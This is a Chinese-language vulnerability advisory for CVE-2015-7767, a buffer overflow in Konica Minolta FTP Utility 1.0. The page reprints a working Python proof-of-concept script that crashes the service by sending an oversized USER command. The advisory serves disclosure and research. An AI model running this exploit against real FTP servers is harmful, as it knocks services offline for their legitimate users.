SEARU.ORG
当前位置:SEARU.ORG > Linux 教程 > 正文

Konica Minolta FTP Utility拒绝服务漏洞(CVE-2015-7767)

Konica Minolta FTP Utility拒绝服务漏洞(CVE-2015-7767)

发布日期:2015-09-11
更新日期:2015-10-10

受影响系统:

konicaminolta FTP Utility 1.0

描述:


CVE(CAN) ID: CVE-2015-7767

KONICA MINOLTA FTP Utility是KONICA MINOLTA复印机使用的一个软件,可以把扫描的软件直接传到电脑里面。

Konica Minolta FTP Utility 1.0在实现上存在缓冲区溢出漏洞,远程攻击者通过较长的USER命令,利用此漏洞可造成拒绝服务(应用崩溃)。

<*来源:Shankar Damodaran
  *>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Shankar Damodaran ()提供了如下测试方法:

#!/usr/bin/python
# Exploit Title: Konica Minolta FTP Utility 1.0 Remote DoS PoC
# Date: 21-08-2015
# Exploit Author: Shankar Damodaran
# Vendor Homepage: http://www.konicaminolta.com/
# Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Version: 1.0
# Tested on: Microsoft Windows XP Professional SP3 English

import socket

# The ip address of the remote host
ftphost = ‘192.168.1.7’
# The port of the remote host
ftpport = 21

# Fuzzed packet of a certain length, Appending this to the USER command and requesting the remote ftp server denies requests for other legitimate users.
crafted_user_name= “B” * 450012  # DoS

# Establishing connection
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((ftphost,ftpport))
s.recv(1024)

# Sending the evil input.
s.send(‘USER’ + crafted_user_name +’\r\n’)

# Once the packet has been sent, the DoS will occur on the remote FTP server. By sending an interrupt through (Ctrl+C), will resume the FTP server from DoS. (Note : The FTP server will not get crashed)
s.send(‘QUIT \r\n’)
s.close()

# End of PoC – Shankar Damodaran

建议:


厂商补丁:

konicaminolta
————-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.konicaminolta.com/

未经允许不得转载:SEARU.ORG » Konica Minolta FTP Utility拒绝服务漏洞(CVE-2015-7767)

赞 (0)
分享到:更多 ()

评论 0